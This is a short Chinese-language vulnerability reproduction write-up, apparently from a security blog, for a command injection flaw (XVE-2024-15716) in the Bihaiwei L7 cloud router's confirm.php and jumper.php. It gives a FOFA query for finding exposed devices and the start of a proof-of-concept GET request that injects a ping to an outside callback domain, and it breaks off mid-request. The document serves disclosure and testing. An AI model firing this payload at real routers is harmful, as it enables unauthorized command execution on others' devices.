碧海威L7云路由无线运营版 confirm.php/jumper.php 命令注入漏洞复现(XVE-2024-15716)

0x01 产品简介

碧海威L7网络设备是 北京智慧云巅科技有限公司下的产品，基于国产化ARM硬件平台，采用软硬一体协同设计方案，释放出产品最大效能，具有高性能，高扩展，产品性能强劲，具备万兆吞吐能力，支持上万用户同时在线等高性能。其采用简单清晰的可视化WEB管理界面，支持最新HTML5，方便移动设备访问管理，分级别多层次管理模块，使用简单，维护方便;设备状况、网络流量一目了然，一键备份/恢复，让网络管理更简单。是为酒店、度假村、商场和车站等商用无线管理者独身订造的专用网络设备，具备路由、防火墙、流控、无线AC控制器、微信认证等多项功能。

0x02 漏洞概述

碧海威L7 confirm.php、jumper.php接口处存在RCE漏洞，恶意攻击者可能利用此漏洞执行恶意命令，获取服务器敏感信息，最终可能导致服务器失陷。

0x03 影响范围

碧海威科技-L7

0x04 复现环境

FOFA：app="碧海威科技-L7云路由"

0x05 漏洞复现

PoC-1

GET /notice/confirm.php?t=;ping%20fwvjytharz.dgrh3.cn HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows NT